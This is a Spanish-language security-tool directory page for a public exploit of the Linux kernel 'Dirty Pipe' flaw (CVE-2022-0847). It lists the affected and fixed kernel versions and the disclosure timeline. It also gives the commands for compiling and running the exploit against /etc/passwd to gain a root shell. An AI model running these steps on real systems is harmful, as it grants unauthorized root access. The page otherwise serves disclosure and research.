Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0847 — CVE-2022-0847 | Kitploit
Herramientas/GitHubGitHub/al1ex/cve-2022-0847
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Binarios
GitHubal1ex/cve-2022-0847

CVE-2022-0847

CVE-2022-0847

Ver Repositorio
9117hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Información

root@kitploit:~
Exploit Title: Local Privilege Escalation in Linux kernel (CVE-2022-0847)
Date: 03/07/2022
Exploit Author: Max Kellermann <[email protected]>
Tested on: ubuntu 20.04.1 LTS
Affect product:Linux kernel 5.8 or later
Fixed Product:Linux kernel 5.16.11, 5.15.25, 5.10.102
CVE ID: CVE-2022-0847

Cómo explotarlo

Entorno de prueba:

env

Escalada de privilegios local

root@kitploit:~
cp /etc/passwd /tmp/passwd.bak
gcc exp.c -o exp
./exp /etc/passwd 1 ootz:
su rootz
id

exp

Referencia

https://dirtypipe.cm4all.com/

Cronología

  • 2021-04-29: primer ticket de soporte sobre corrupción de archivos
  • 2022-02-19: el problema de corrupción de archivos se identificó como un error del kernel de Linux, que resultó ser una vulnerabilidad explotable
  • 2022-02-20: informe de error, exploit y parche enviados al equipo de seguridad del kernel de Linux
  • 2022-02-21: error reproducido en Google Pixel 6; informe de error enviado al equipo de seguridad de Android
  • 2022-02-21: parche enviado a LKML (sin detalles de vulnerabilidad) como lo sugirieron Linus Torvalds, Willy Tarreau y Al Viro
  • 2022-02-23: lanzamientos estables de Linux con mi corrección de error (5.16.11, 5.15.25, 5.10.102)
  • 2022-02-24: Google fusiona mi corrección de error en el kernel de Android
  • 2022-02-28: notificado a la lista de correo linux-distros
  • 2022-03-07: divulgación pública
Descargar herramienta